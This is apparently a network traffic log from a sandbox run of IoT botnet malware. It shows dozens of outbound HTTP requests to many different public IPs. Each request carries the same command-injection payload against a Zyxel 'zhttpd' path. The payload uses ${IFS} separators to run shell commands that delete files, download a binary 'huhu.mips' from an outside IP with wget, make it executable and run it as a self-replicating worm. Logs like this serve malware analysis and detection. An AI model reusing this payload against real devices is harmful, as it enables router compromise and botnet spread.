                                                      Feb 2, 2024 06:35:16.196403980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      514192.168.2.1437664221.122.175.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196455956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      515192.168.2.1437684205.113.88.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196501017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      516192.168.2.1445704207.63.66.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196525097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      517192.168.2.1439814111.43.229.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196559906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      518192.168.2.1435232134.53.0.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196597099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      519192.168.2.1455228221.176.79.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196661949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      520192.168.2.144780289.233.111.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196696043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      521192.168.2.143625078.58.34.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196784019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      522192.168.2.1439784117.51.102.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196784019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      523192.168.2.1458766204.39.139.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196795940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      524192.168.2.1457380181.159.38.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196811914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      525192.168.2.1456598122.62.165.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196845055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      526192.168.2.144096618.59.18.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196888924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      527192.168.2.145857861.227.79.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196932077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      528192.168.2.145583093.62.87.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196970940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      529192.168.2.145316466.53.55.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196996927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      530192.168.2.14444524.138.197.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197057962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      531192.168.2.144667495.43.146.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197096109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      532192.168.2.1448222124.66.56.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197137117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      533192.168.2.1444012218.235.253.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197550058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      534192.168.2.1439194177.249.69.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197674036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      535192.168.2.144607219.242.24.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197715044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      536192.168.2.143696477.151.235.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197819948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      537192.168.2.145148497.43.45.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197820902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      538192.168.2.1444788189.214.196.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197820902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      539192.168.2.144936439.136.101.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197940111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      540192.168.2.1445100143.135.197.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197941065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      541192.168.2.1447194128.177.233.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.197969913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      542192.168.2.1439024179.247.203.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.198014975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      543192.168.2.144955453.223.235.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.198014975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      544192.168.2.144939894.159.29.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.198204994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      545192.168.2.1445436182.64.159.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:18.208904982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      546192.168.2.1438400219.227.224.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:19.213484049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      547192.168.2.1442546120.189.48.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:19.213526964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      548192.168.2.1445522108.203.122.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:19.213574886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      549192.168.2.145680434.248.140.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:19.213661909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      550192.168.2.1437254164.251.57.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.217766047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      551192.168.2.1458546145.208.48.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.217801094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      552192.168.2.1436118155.122.34.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.217853069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      553192.168.2.1443904141.51.8.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.217884064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      554192.168.2.143975066.248.203.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.217932940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      555192.168.2.1447946199.166.63.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.217950106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      556192.168.2.1440264163.159.178.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.217950106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      557192.168.2.1459894165.217.170.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.217957020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      558192.168.2.145437671.208.67.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.218065023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      559192.168.2.145112049.129.79.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.218131065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      560192.168.2.1444180149.214.136.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:20.218265057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      561192.168.2.1437668184.33.93.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.221941948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      562192.168.2.1443882183.90.9.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.221977949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      563192.168.2.1438302107.35.247.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.222022057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      564192.168.2.145613069.55.56.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.222068071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      565192.168.2.144202681.97.208.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.222132921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      566192.168.2.1437082153.175.62.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.222170115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      567192.168.2.145392097.25.96.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.222225904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      568192.168.2.145029691.53.20.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.222251892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      569192.168.2.145629259.29.115.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:21.222289085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      570192.168.2.1460570218.43.117.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:22.226232052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      571192.168.2.1455340110.158.234.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:22.226273060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      572192.168.2.145820844.1.28.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230252981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      573192.168.2.1445562136.93.239.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230292082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      574192.168.2.1439162204.52.239.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230324030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      575192.168.2.1458416107.114.149.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:23.230398893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      576192.168.2.145963436.40.190.41443
                                                      TimestampBytes transferredDirectionData
